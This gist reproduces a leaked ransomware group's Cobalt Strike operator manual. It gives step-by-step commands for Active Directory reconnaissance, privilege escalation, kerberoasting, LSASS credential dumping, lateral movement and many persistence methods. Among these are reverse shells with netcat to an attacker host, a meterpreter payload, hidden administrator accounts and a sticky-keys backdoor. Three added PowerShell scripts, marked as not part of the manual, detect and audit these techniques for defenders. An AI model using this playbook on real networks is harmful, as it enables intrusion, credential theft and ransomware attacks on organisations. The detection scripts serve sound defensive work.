@insi2304
Created August 17, 2022 04:58
CS manual Conti
MANUAL COBALT STRIKE
!---------------------------------------------------Standard Commands---------------------------------------------------!
Creating a payload:
Attacks -> Packages ->
interact - select an agent
help - shows the list of commands
help [command] - shows help for a specific command
!---------------------------------------------Collecting information on AD---------------------------------------------!
!---Getting a Domain Controller---!
net domain_controllers
net dclist
shell nltest /dclist
!---Getting a list of computers---!
shell net group "Domain Computers" /domain
net computers
net view
Get-ADComputer -Filter {enabled -eq $true} -properties *|select Name, DNSHostName, OperatingSystem !--Test--!
!---Getting a list of subdomains---!
net domain_trusts
shell nltest /DOMAIN_TRUSTS
!---Getting a list of groups and users---!
shell net group "domain Admins" /domain - list of Domain Admins; on German-language domains: shell net group "Domänen-Admins" /domain
shell net group "Enterprise Admins" /domain - Enterprise admins
shell net group "domain users" /domain - list Domain users
net group
net local group
net user
!---Additionally---!
net domain|systeminfo | findstr /B "Domain" - Show which domain the PC is in
net sessions - Show active sessions on PC
net time - Show time on PC
net logons - Shows lists of users logged into the PC
!---Getting ShareFinder---!
net share - Show share list on PC
We collect the available shares and check whether any ADMIN$ shares are accessible to our current domain user.
- powershell-import /opt/PowerSploit-dev/Recon/PowerView.ps1
-powershell Invoke-ShareFinder -CheckShareAccess -Verbose
Analog:
- powershell-import /opt/PowerSploit-dev/Recon/ShareFinder.ps1
- psinject 4728 x86 Invoke-ShareFinder -CheckShareAccess -Verbose | Out-File -Encoding ascii C:\ProgramData\found_shares.txt
(at this point the scan is running and its result is being written to the file; the file reaches its full size when the scan finishes and can then be downloaded)
Also do not forget to look at the processes with the ps command: you can find another user there and migrate into his process: Explore > Process list > select the other user's process.
After migrating to a new user you also need to dump the shares again to see where you can get in as that user.
When you dump the shares, at the end of the dump look in the C:\ProgramData directory for sh.txt or shares.txt, download it and see how many "remote admin" entries are in the text file; if there is more than one, there is access to another computer.
!---Additional tool---!
!-Collecting information about the structure of Active Directory with AdFind.exe-!
- upload adfind.exe and adf.bat into a writable folder
- move the Cobalt Strike beacon into this folder
- run shell adf.bat
- wait for the script to finish
- download the result and delete what was uploaded to the machine
adf.bat content:
adfind.exe -f "(objectcategory=person)" > ad_users.txt
adfind.exe -f "objectcategory=computer" > ad_computers.txt
adfind.exe -f "(objectcategory=organizationalUnit)" > ad_ous.txt
adfind.exe -sc trustdmp > trustdmp.txt
adfind.exe -subnets -f (objectCategory=subnet)> subnets.txt
adfind.exe -f "(objectcategory=group)" > ad_group.txt
adfind.exe -gcb -sc trustdmp > trustdmp.txt
!-Collecting information on the current machine using Seatbelt-!
- execute-assembly /opt/cobalt_strike_extension_kit/exe/Seatbelt.exe -group=all -outputfile="C:\ProgramData\textinfo.txt"
(I give no explanations here; the number of checks is considerable and all the information collected is more or less important, both for the local machine and for the network)
!------------------------------------------------Methods of privilege escalation------------------------------------------------!
!---Use exploits---!
shell systeminfo - get information about the system.
Save the information received to a text file (win10-systeminfo.txt).
Use Windows-Exploit-Suggester; it will show roughly which exploits to use.
!---Updating exploits database---!
/windows-exploit-suggester.py --update
[*] initiating...
[*] successfully requested base url
[*] scraped ms download url
[+] writing to file 2021-03-09-mssb.xls
[*]done
!---Run the program to detect exploits---!
./windows-exploit-suggester.py --database 2021-03-09-mssb.xls --systeminfo win10-systeminfo.txt
Next, from the list of exploits that Windows-Exploit-Suggester produced, we use one on the machine. (Before that, read about the exploit you want to use: it may not suit your target; pay particular attention to the OS version and its bitness.)
For example:
Option 1:
elevate ms16-135 [listener] - the command uses exploit ms16-135 and, if successful, spawns a new session as SYSTEM.
Option 2:
For example, go to the directory C:\Users\User1\Pictures (any other directory will do, as long as you can upload the payload there)
Upload your payload: upload artifact.exe|dll|One-liner
runasadmin ms16-032 (specify directory) artifact.exe [option if needed] - the command uses exploit ms16-032 to run your payload as SYSTEM. In this case you receive a new agent running as SYSTEM.
!---SharpUp---!
SharpUp is a misconfiguration scanner for privilege escalation.
Doing a scan:
- execute-assembly /opt/cobalt_strike_extension_kit/exe/SharpUp.exe
Sample output (there may be nothing to find):
=== SharpUp: Running Privilege Escalation Checks ===
=== Modifiable Services ===
Name :VMtools
DisplayName :VMware Tool
Discription : Provides support for synchronizing objects between the host and qwest operation system.
State :Stopped
StartMode :Auto
PathName :C:\Program Files\VMware\VMware Tools\vmtoolsd
=== Modifiable Service Binaries ===
===AlwaysInstallElevated Registry Keys===
=== Modifiable Folders in %PATH% ===
=== Modifiable Registry Autoruns ===
=== *Special* User Privileges ===
=== Unattended Install Files ===
=== McAfee Sitelist.xml Files ===
=== Cached GPP Password ===
We see that our user can modify the VMtools service, which we can use to start the payload.
Go to Attacks --> Windows Executable (S) --> select our [Listener] and Output: Windows Service EXE --> Generate --> File name: vmtoolsd.exe --> Save
Next, go to any directory, for example C:\Users\User1\Pictures, and upload our payload.
Now we modify the service:
run sc config vmtoolsd binpath=C:\Users\User1\Pictures\vmtoolsd.exe
run start vmtoolsd.exe
After that, the agent from under SYSTEM should come.
!-----------------------------------------------Obtaining hashes and passwords-----------------------------------------------!
(CAN BE EXECUTED WITHOUT PRIVILEGES)
!----kerberoast attack - getting hashes from memory---!
We carry out a kerberoast attack:
- execute-assembly /opt/cobalt_strike_extension_kit/exe/Rubeus.exe kerberoast /ldapfilter:'admincount=1' /format:hashcat /outfile:C:\ProgramData\hashes.txt
- execute-assembly /opt/cobalt_strike_extension_kit/exe/Rubeus.exe asreproast /format:hashcat /outfile:C:\ProgramData\asrephashes.txt
- download the resulting files (if they produced a result)
- if nothing was produced, use the alternative PowerShell script for the attack:
- powershell-import /opt/PowerSploit-dev\Recon\PowerView.ps1
Analog:
- powershell-import /opt/PowerSploit-dev\Recon\Invoke-Kerberoast.ps1
- psinject 4728 x86 Invoke-Kerberoast -OutputFormat HashCat | fl | Out-File -FilePath c:\ProgramData\pshashes.txt -append -force -encoding UTF8
4728 here is the current PID and x86 its bitness
(the hashes obtained are sent for brute-forcing to recover cleartext passwords, or are used in the context of SYSTEM rights)
We collect information from the Chrome browser:
- execute-assembly /opt/cobalt_strike_extension_kit/exe/SharpChrome.exe logins /showall
(here we get the current user's saved passwords and some idea of the network and external resources he visits)
Checking for saved passwords in domain group policy files
- execute-assembly /opt/cobalt_strike_extension_kit/exe/Net-GPPPassword.exe
Analog:
- powershell-import /opt/PowerSploit-dev/Exfiltration/Get-GPPPassword.ps1
(ONLY WITH PRIVILEGED RIGHTS*)
If we have PRIVILEGED rights, we can get hashes and passwords with the "hashdump" and "logonpasswords" commands. This is the quick way, but it may not work, for example if AV interferes.
It is better to do this:
- Run ps and find the lsass.exe process (it holds our passwords). Note its PID.
- Dump it.
Let's go to the beacon:
- cd Windows
- shell rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump PID C:\Users\User1\lsass.dmp full
- In the PID parameter, specify the PID number of LSASS.exe
- You can use any directory where writing is allowed, for example: C:\Users\User1\lsass.dmp
Analog:
- execute-assembly /opt/cobalt_strike_extension_kit/exe/SharpDump.exe
When the dump is made, download it.
Once downloaded, open mimikatz on your machine and run the following commands (put lsass.dmp in the mimikatz folder):
sekurlsa::minidump lsass.dmp
securlsa::logonPasswords
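Added defender-side example, not part of this manual: the Rubeus kerberoast/asreproast requests above are recorded on the domain controller as Security events 4769/4768, and the comsvcs.dll MiniDump is recorded on the endpoint as Sysmon ProcessAccess (event 10) and ProcessCreate (event 1) entries. The script below pulls those events and reports the patterns; it assumes Kerberos auditing and Sysmon are enabled, that it runs elevated, and that the thresholds are tuned to the environment.

```powershell
# Added detection example (not from the manual). Assumptions: "Audit Kerberos Service Ticket
# Operations" and "Audit Kerberos Authentication Service" are on at the DC, Sysmon logs
# event 10 for lsass.exe, and the 10-ticket threshold is a starting point, not a baseline.

function ConvertFrom-EventData {
    # Turn the <EventData><Data Name=...> list of one event into a hashtable.
    param([System.Diagnostics.Eventing.Reader.EventRecord]$Event)
    $x = [xml]$Event.ToXml()
    $d = @{}
    foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
    return $d
}

function Find-RoastingActivity {
    param([int]$Hours = 24, [int]$MinServiceTickets = 10)
    $since = (Get-Date).AddHours(-$Hours)
    # 4769 = service ticket (TGS) request, 4768 = TGT (AS) request
    $events = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4768, 4769; StartTime = $since } -ErrorAction SilentlyContinue
    $rows = foreach ($e in $events) {
        $d = ConvertFrom-EventData $e
        [pscustomobject]@{
            Id = $e.Id; Account = $d['TargetUserName']; Service = $d['ServiceName']
            EncType = $d['TicketEncryptionType']; PreAuth = $d['PreAuthType']; Ip = $d['IpAddress']
        }
    }
    # Kerberoast: one account pulling many RC4 (0x17) service tickets for user SPNs.
    # Computer accounts (name ends in $) and krbtgt are excluded as normal noise.
    $kerberoast = $rows |
        Where-Object { $_.Id -eq 4769 -and $_.EncType -eq '0x17' -and $_.Service -notlike '*$' -and $_.Service -ne 'krbtgt' } |
        Group-Object Account | Where-Object { $_.Count -ge $MinServiceTickets } |
        ForEach-Object {
            [pscustomobject]@{ Finding = 'Kerberoast'; Account = $_.Name; Count = $_.Count
                               Detail = ($_.Group.Service | Sort-Object -Unique) -join ',' }
        }
    # AS-REP roast: a TGT issued without pre-authentication (PreAuthType 0) using RC4.
    $asrep = $rows |
        Where-Object { $_.Id -eq 4768 -and $_.PreAuth -eq '0' -and $_.EncType -eq '0x17' } |
        ForEach-Object { [pscustomobject]@{ Finding = 'AS-REP roast'; Account = $_.Account; Count = 1; Detail = "from $($_.Ip)" } }
    return @($kerberoast) + @($asrep)
}

function Find-LsassDumpActivity {
    param([int]$Hours = 24)
    $since = (Get-Date).AddHours(-$Hours)
    $log = 'Microsoft-Windows-Sysmon/Operational'
    # Event 10 (ProcessAccess): a MiniDump needs PROCESS_VM_READ (0x10) on lsass.exe.
    $access = Get-WinEvent -FilterHashtable @{ LogName = $log; Id = 10; StartTime = $since } -ErrorAction SilentlyContinue
    foreach ($e in $access) {
        $d = ConvertFrom-EventData $e
        if ($d['TargetImage'] -notlike '*\lsass.exe') { continue }
        $mask = [Convert]::ToInt32($d['GrantedAccess'], 16)   # GrantedAccess is a hex string such as 0x1FFFFF
        if (($mask -band 0x10) -eq 0) { continue }
        [pscustomobject]@{ Finding = 'LSASS read'; Time = $e.TimeCreated; Source = $d['SourceImage']; Detail = $d['GrantedAccess'] }
    }
    # Event 1 (ProcessCreate): the rundll32 comsvcs.dll MiniDump command line itself.
    $create = Get-WinEvent -FilterHashtable @{ LogName = $log; Id = 1; StartTime = $since } -ErrorAction SilentlyContinue
    foreach ($e in $create) {
        $d = ConvertFrom-EventData $e
        if ($d['CommandLine'] -match 'comsvcs(\.dll)?.*MiniDump') {
            [pscustomobject]@{ Finding = 'comsvcs MiniDump'; Time = $e.TimeCreated; Source = $d['ParentImage']; Detail = $d['CommandLine'] }
        }
    }
}

Find-RoastingActivity
Find-LsassDumpActivity
```

Run Find-RoastingActivity on a domain controller and Find-LsassDumpActivity on the endpoint; the Security log requires administrator rights to read.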
!-----------------------------------------------------------Persistence-----------------------------------------------------------!
(CAN BE EXECUTED WITHOUT PRIVILEGES)
Create explorers.bat and add this code (do not copy the braces):
{
@echo off
set fullname=C:\Temp\explorers.exe
set prog=explorers.exe
:begin
tasklist /fi "IMAGENAME eq %prog%"|>nul find "%prog%"||start "" "%fullname%"
>nul ping 127.1 -n 6
goto :begin
}
Next, upload our explorers.exe payload and the explorers.bat batch file to any directory where files can be written, for example "C:\Users\User1\Pictures"
Next, open CS, open our beacon and go to the folder where we uploaded the files
Run the commands (they hide our files):
shell attrib +h [explorers.exe]
shell attrib +h [explorers.bat]
Next, add the keys to the registry:
shell reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v explorers /t REG_SZ /d "C:\Temp\explorers.exe"
shell reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v explorers /t REG_SZ /d "C:\Temp\explorers.bat"
Check:
shell reg query "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /s
-------------------------------------------------- -------------------------------------------------- --------------------------------
You can use a PowerShell stager, but if it runs as a normal user a cmd window will appear on the desktop and immediately close
{
@echo off
set fullname=powershell.exe
set paramtr= powershell -nop -w hidden -encodedcommand...(your stager)
setprog=powershell.exe
:begin
tasklist /fi "IMAGENAME eq %prog%"|>nul find "%prog%"||start "" "%fullname%" "" "%paramtr%"
>nul ping 127.1 -n 6
goto :begin
}
Next, add the key to the registry:
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v explorers /t REG_SZ /d "C:\Temp\explorers.bat"
Check:
reg Query "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /s
The key can also be written under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, but creating a key there requires PRIVILEGED RIGHTS *
!---In-memory---!
Planting a backdoor that lives only in RAM makes sense when you need a foothold on the target machine without leaving traces on disk. Antivirus usually has little control over memory activity, since monitoring it costs a lot of extra resources. Even an experienced user is unlikely to notice something hidden inside a legitimate process.
We will use meterpreter as the in-memory backdoor. It is perhaps the best-known RAT that can run exclusively in memory without touching the disk.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=1.2.3.4 LPORT=8888 -f raw -o meter32.bin exitfunc=thread StagerRetryCount=999999
cmd$> inject_windows.exe PID meter32.bin
We pay for maximum secrecy with the loss of persistence after a reboot.
Since the malicious thread is running outside of any library, Procexp often shows such a thread as running from address zero.
!---Office---!
This method is suitable if the attacked user often works with the Office suite. Not so rare!
reg add "HKCU\Software\Microsoft\Office test\Special\Perf" /t REG_SZ /d C:\users\username\meter.dll
Pros: Survives reboot, any user will do.
Cons: Unmanaged startup interval.
(ONLY WITH PRIVILEGED RIGHTS*)
!---Persistence through the Task Scheduler---!
Persistence through the Task Scheduler is set up by importing our prepared XML.
1) Run the prepared Python script to generate the XML.
This script will require you to enter several parameters:
- start program - the program that will run the task: powershell.exe | artifact.exe | rundll32.exe
- stager PowerShell or other parameters - the parameters passed to the program; for powershell.exe the PowerShell stager, for artifact.dll [Parameter]
- date registration task - the task registration date; you can copy it from another task you want to disguise as
- date end task - the end date of the task
- time repeat task in day - how often the task repeats: "PT3M" - every 3 minutes; "PT1R" - every hour; if the program is already running, the task will not start a new session of it
- name_xml - the name of your xml; use names like Adobe Update, WindowsDefender, etc.
After that the required XML is generated. Next we upload it to the client PC where we want persistence.
Then go to the directory where we uploaded the XML and run in the beacon:
shell schtasks /Create /RU SYSTEM /XML Security_Update.xml /TN WinDefender
After that, delete the XML; we no longer need it.
rm Security_Update.xml
!---Services---!
Use services for persistence, as Service Manager will automatically restart the service if needed.
shell sc create persistence binPath= "nc.exe -e \windows\system32\cmd.exe attacker.tk 8888" start= auto
shell sc failure persistence reset= 0 actions= restart/60000/restart/60000/restart/60000
shell sc start persistence
Pros: Survives reboot, manageable startup interval, any user is fine.
Cons: administrator rights are required.
!---Configs---!
Organizing persistence by changing the OS configuration is a great way to hide from antivirus. This is the only case where we don't use any executable code at all. But this only applies if we have direct access to the target machine.
Creating a hidden user on behalf of which you can then get remote access is perhaps the most famous variant of such an attack.
net user attacker p@ssw0rd /add
net localgroup administrators /add attacker
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v attacker /t REG_DWORD /d 0 /f
Easy and effective backdoor in Windows via RDP:
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t reg_sz /d "\windows\system32\cmd.exe"
reg add "HKLM\system\currentcontrolset\control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0x0 /f
Pros: hard to detect by antivirus, survives reboots.
Cons: Requires administrator/root rights, not suitable if machine is behind NAT or firewall.
!---Debugger---!
If the attacker knows that the attacked user often launches some program, say a calculator, then he can inject his code into the body of this program using a joiner. However, any intervention in executable files inexorably increases the level of mistrust towards them on the part of the antivirus. A much more elegant implementation would be to intercept the launch:
copycalc.exe _calc.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\calc.exe" /v Debugger /t reg_sz /d "cmd /C _calc.exe & c:\windows\nc.exe -ec: \windows\system32\cmd.exe attacker.tk 8888" /f
Once the victim starts and then closes the calculator, the attacker will accept a reverse shell.
Plus: survives a reboot.
Cons: Requires admin rights.
!---Gflags---!
In much the same way, you can organize your code to run when the user closes a certain program.
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "nc -e \windows\system32\cmd.exe attacker.tk 8888"
Plus: survives a reboot.
Cons: Requires admin rights.
Autoruns does not detect this method, but you can check the registry branch:
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit
!---WMI---!
A fairly reliable way to autorun is through WMI events. We can launch the backdoor at regular intervals.
wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="persistence", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="persistence", ExecutablePath="C:\users\admin\meter.exe",CommandLineTemplate="C:\users\admin\meter.exe"
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="persistence"", Consumer="CommandLineEventConsumer.Name="persistence""
Pros: Survives reboot, manageable startup interval.
Cons: Requires admin rights.
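Added audit example, not part of this manual: the Task Scheduler, Services and WMI sections above are the three persistence channels that live outside the registry. The script below enumerates them on a host and reports tasks whose binary sits outside Windows/Program Files or whose arguments look like a hidden/encoded PowerShell stager, services with a binary outside those roots together with their restart-on-failure setting, and every permanent WMI event subscription. It assumes it runs elevated; the "trusted roots" heuristic and the argument patterns are assumptions to tune, and hits are leads to verify, not verdicts.

```powershell
# Added audit example (not from the manual). Assumptions: run as administrator; a binary
# under SystemRoot or Program Files is treated as trusted (attackers can still write there).

$TrustedRoots = @("$env:SystemRoot\", "$env:ProgramFiles\", "${env:ProgramFiles(x86)}\") | Where-Object { $_.Length -gt 1 }

function Test-TrustedBinary {
    # True when the executable part of a command line sits under a trusted root.
    param([string]$CommandLine)
    if (-not $CommandLine) { return $true }
    $exe = if ($CommandLine -match '^"?([^"]+?\.(exe|dll|cmd|bat))') { $Matches[1] } else { ($CommandLine -split '\s+')[0] }
    foreach ($root in $TrustedRoots) { if ($exe -like "$root*") { return $true } }
    return $false
}

function Find-SuspiciousTasks {
    foreach ($t in Get-ScheduledTask) {
        foreach ($a in $t.Actions) {
            if (-not $a.Execute) { continue }   # COM-handler and e-mail actions have no Execute
            $why = @()
            if (-not (Test-TrustedBinary $a.Execute)) { $why += 'binary outside trusted roots' }
            # the stager shape used in the manual: powershell -nop -w hidden -encodedcommand ...
            if ($a.Arguments -match '-(enc|encodedcommand|w hidden|nop)\b') { $why += 'hidden/encoded PowerShell arguments' }
            if ($why.Count -eq 0) { continue }
            [pscustomobject]@{ Kind = 'Task'; Name = "$($t.TaskPath)$($t.TaskName)"; RunAs = $t.Principal.UserId
                               Command = "$($a.Execute) $($a.Arguments)"; Why = $why -join '; ' }
        }
    }
}

function Find-SuspiciousServices {
    foreach ($s in Get-CimInstance -ClassName Win32_Service) {
        if (Test-TrustedBinary $s.PathName) { continue }
        # sc qfailure prints the recovery actions; RESTART there matches the manual's "sc failure" setting
        $restarts = (& sc.exe qfailure $s.Name 2>$null) -match 'RESTART'
        [pscustomobject]@{ Kind = 'Service'; Name = $s.Name; RunAs = $s.StartName; Command = $s.PathName
                           Why = "binary outside trusted roots; start=$($s.StartMode); restart-on-failure=$([bool]$restarts)" }
    }
}

function Find-WmiSubscriptions {
    # Every permanent subscription is listed; a clean host normally has only the SCM event log binding.
    $ns = 'root/subscription'
    $consumers = @(Get-CimInstance -Namespace $ns -ClassName CommandLineEventConsumer -ErrorAction SilentlyContinue) +
                 @(Get-CimInstance -Namespace $ns -ClassName ActiveScriptEventConsumer -ErrorAction SilentlyContinue)
    foreach ($b in Get-CimInstance -Namespace $ns -ClassName __FilterToConsumerBinding -ErrorAction SilentlyContinue) {
        # Filter and Consumer are object references; their Name key identifies the instance
        $c = $consumers | Where-Object { $_.Name -eq $b.Consumer.Name }
        $f = Get-CimInstance -Namespace $ns -ClassName __EventFilter -Filter "Name='$($b.Filter.Name)'" -ErrorAction SilentlyContinue
        [pscustomobject]@{ Kind = 'WMI'; Name = $b.Filter.Name; RunAs = 'SYSTEM'
                           Command = (@($c.CommandLineTemplate, $c.ExecutablePath, $c.ScriptText) | Where-Object { $_ }) -join ' | '
                           Why = "filter query: $($f.Query)" }
    }
}

@(Find-SuspiciousTasks) + @(Find-SuspiciousServices) + @(Find-WmiSubscriptions) | Format-Table -AutoSize -Wrap
```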
!---AppInit---!
Windows has an interesting way to inject libraries into windowed applications using AppInit (they should use user32.dll).
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs /t reg_dword /d 0x1 /f
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v AppInit_DLLs /t reg_sz /d "c:\path\to\meter64.dll" /f
reg add "HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs /t reg_dword /d 0x1 /f
reg add "HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows" /v AppInit_DLLs /t reg_sz /d "c:\path\to\meter32.dll" /f
Plus: survives a reboot.
Cons: Requires admin rights, unmanaged startup interval.
!---Lsass---!
Another possibility is to register the library in the lsass system process. This is a rather advantageous place, since this process stores the very accounts that we extract with the mimikatz utility.
reg add "HKLM\system\currentcontrolset\control\lsa" /v "Notification Packages" /t reg_multi_sz /d "rassfm\0scecli\0meter" /f
Plus: survives a reboot.
Cons: Requires admin rights, unmanageable startup interval, can kill the system.
!---Winlogon---!
To open a shell every time a user logs in, you can use the Winlogon mechanism.
reg add "HKLM\software\microsoft\windows nt\currentversion\winlogon" /v UserInit /t reg_sz /d "c:\windows\system32\userinit.exe,c:\windows\meter.exe"
Plus: survives a reboot.
Cons: Unmanaged startup interval.
!---Netsh---!
The Netsh network configuration utility also allows you to load an arbitrary library. This opens up the possibility of organizing an impromptu autoload through it. The result will look innocuous, since the Windows system component is initially called.
cmd#> c:\windows\syswow64\netsh.exe
netsh> add helper c:\windows\meter32.dll
cmd#> reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v persistence /t REG_SZ /d "C:\Windows\SysWOW64\netsh.exe"
As a result, we get the following chain: autorun → netsh.exe → meter.dll.
In this case, meter.dll will be hidden from the user's eyes - he will only see the launch of legitimate Netsh, a native Windows component.
Pros: survives a reboot, hard to detect by the user.
Cons: Requires admin rights.
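Added audit example, not part of this manual: the Persistence, Office, Configs, Debugger, Gflags, AppInit, Lsass, Winlogon and Netsh sections above all write to the registry. The script below reads each of those locations (Run keys, the Office "Perf" key, SpecialAccounts\UserList, IFEO Debugger and GlobalFlag, SilentProcessExit, AppInit_DLLs, LSA notification packages, Winlogon Userinit/Shell and the netsh helper list) and reports values that deviate from a stock client. It assumes it runs elevated; the expected defaults and the "netsh helpers are bare DLL names" rule are assumptions, so compare against a known-good host.

```powershell
# Added audit example (not from the manual). Run as administrator; defaults assumed for a stock client.

$HKLM_NT = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion'

function Get-UserValues {
    # Values of a key without the PS* bookkeeping properties; empty if the key is absent.
    param([string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) { return @() }
    (Get-ItemProperty -LiteralPath $Path).PSObject.Properties |
        Where-Object { $_.Name -notmatch '^PS(Path|ParentPath|ChildName|Drive|Provider)$' }
}

function New-Finding {
    param([string]$Check, [string]$Location, [string]$Value, [string]$Why)
    [pscustomobject]@{ Check = $Check; Location = $Location; Value = $Value; Why = $Why }
}

function Find-RegistryPersistence {
    # 1. Run keys: flag script/netsh launchers and anything outside Windows or Program Files
    $runKeys = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
               'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
               'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run'
    foreach ($k in $runKeys) {
        foreach ($v in Get-UserValues $k) {
            $data = [string]$v.Value
            if ($data -match '\.bat|netsh\.exe|ProgramData|\\Users\\|\\Temp\\' -or $data -notmatch '^"?[A-Z]:\\(Windows|Program Files)') {
                New-Finding 'Run key' "$k\$($v.Name)" $data 'launcher outside Windows/Program Files, or script/netsh launcher'
            }
        }
    }
    # 2. Office "Perf" key: any value here is a DLL Office loads at start
    foreach ($v in Get-UserValues 'HKCU:\Software\Microsoft\Office test\Special\Perf') {
        New-Finding 'Office Perf' 'HKCU:\Software\Microsoft\Office test\Special\Perf' ([string]$v.Value) 'DLL loaded by Office on start'
    }
    # 3. Accounts hidden from the logon screen (value 0 = hide)
    foreach ($v in Get-UserValues "$HKLM_NT\Winlogon\SpecialAccounts\UserList") {
        if ([int]$v.Value -eq 0) { New-Finding 'Hidden account' 'Winlogon\SpecialAccounts\UserList' $v.Name 'account hidden from logon UI' }
    }
    # 4. IFEO: Debugger redirects the launch; GlobalFlag bit 0x200 enables silent-process-exit monitoring
    foreach ($sub in Get-ChildItem -LiteralPath "$HKLM_NT\Image File Execution Options" -ErrorAction SilentlyContinue) {
        $p = Get-ItemProperty -LiteralPath $sub.PSPath
        if ($p.Debugger) { New-Finding 'IFEO Debugger' $sub.PSChildName $p.Debugger 'process launch redirected to another program' }
        if ($p.GlobalFlag -and ($p.GlobalFlag -band 0x200)) { New-Finding 'IFEO GlobalFlag' $sub.PSChildName ('0x{0:X}' -f $p.GlobalFlag) 'silent-process-exit monitoring enabled' }
    }
    # 5. SilentProcessExit: MonitorProcess runs when the monitored program exits
    foreach ($sub in Get-ChildItem -LiteralPath "$HKLM_NT\SilentProcessExit" -ErrorAction SilentlyContinue) {
        $p = Get-ItemProperty -LiteralPath $sub.PSPath
        if ($p.MonitorProcess) { New-Finding 'SilentProcessExit' $sub.PSChildName $p.MonitorProcess 'command executed on process exit' }
    }
    # 6. AppInit_DLLs (64- and 32-bit views): expected empty, LoadAppInit_DLLs expected 0
    foreach ($k in "$HKLM_NT\Windows", 'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows') {
        $p = Get-ItemProperty -LiteralPath $k -ErrorAction SilentlyContinue
        if ($p.AppInit_DLLs) { New-Finding 'AppInit_DLLs' $k $p.AppInit_DLLs "DLL injected into user32 processes (LoadAppInit_DLLs=$($p.LoadAppInit_DLLs))" }
    }
    # 7. LSA notification packages: only scecli (and rassfm on RRAS servers) are expected
    $lsa = Get-ItemProperty -LiteralPath 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
    foreach ($pkg in @($lsa.'Notification Packages')) {
        if ($pkg -and $pkg -notin 'scecli', 'rassfm') { New-Finding 'LSA package' 'Control\Lsa\Notification Packages' $pkg 'DLL loaded into lsass.exe' }
    }
    # 8. Winlogon: anything beyond userinit.exe in Userinit, or a Shell other than explorer.exe, is extra
    $wl = Get-ItemProperty -LiteralPath "$HKLM_NT\Winlogon"
    foreach ($entry in ($wl.Userinit -split ',')) {
        if ($entry.Trim() -and $entry.Trim() -notmatch '\\system32\\userinit\.exe$') { New-Finding 'Winlogon Userinit' 'Winlogon\Userinit' $entry 'extra program run at logon' }
    }
    if ($wl.Shell -and $wl.Shell -ne 'explorer.exe') { New-Finding 'Winlogon Shell' 'Winlogon\Shell' $wl.Shell 'non-default shell' }
    # 9. netsh helpers: built-ins are bare DLL names; a value containing a path is what "add helper" leaves (assumption)
    foreach ($k in 'HKLM:\SOFTWARE\Microsoft\NetSh', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\NetSh') {
        foreach ($v in Get-UserValues $k) {
            if ([string]$v.Value -match '\\') { New-Finding 'netsh helper' "$k\$($v.Name)" ([string]$v.Value) 'helper DLL with explicit path' }
        }
    }
}

Find-RegistryPersistence | Format-Table -AutoSize -Wrap
```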
!---------------------------------------------------------Lateral Movement---------------------------------------------------------!
If we managed to get a user's login and password on the victim's PC, we run spawnas Domain\Admin Password [listener]; a new agent will arrive, with its process launched as this user.
If we found the login / password of a domain admin or user, we can take his token; the command is:
- make_token Domain\Admin Pass
If you want to drop the token, the command is:
- rev2self
Go to the menu Cobalt Strike-->Visualization-->Target Table or click on the target icon.
This is where your targets will be located after you do (net dclist, net domain_controllers, net computers, portscan)
Right-click on the PC you want to jump to-->Jump:
psexec
psexec64
psexecpsh
ssh
ssh key
winrm
winrm64
If the agent runs in a SYSTEM process, you can elevate to SYSTEM rights with the getsystem command.
If we found a user's name and hash but could not crack the hash, we use the command pth Domain\Admin hash [command]
(privileged rights are needed). Then, using the commands
- shell dir \\ip\c$
- shell dir \\hostname\c$
check access to the server or ordinary PCs.
If there is access, right-click the session > File Browser > enter the path \\ip\c$ or \\hostname\c$ of the computer you have access to, and upload the payload there
shell wmic /node:[ip] process call create "rundll32.exe C:\Temp\artifact.dll StartW"
shell wmic /node:[ip] process call create "C:\Temp\artifact.exe"
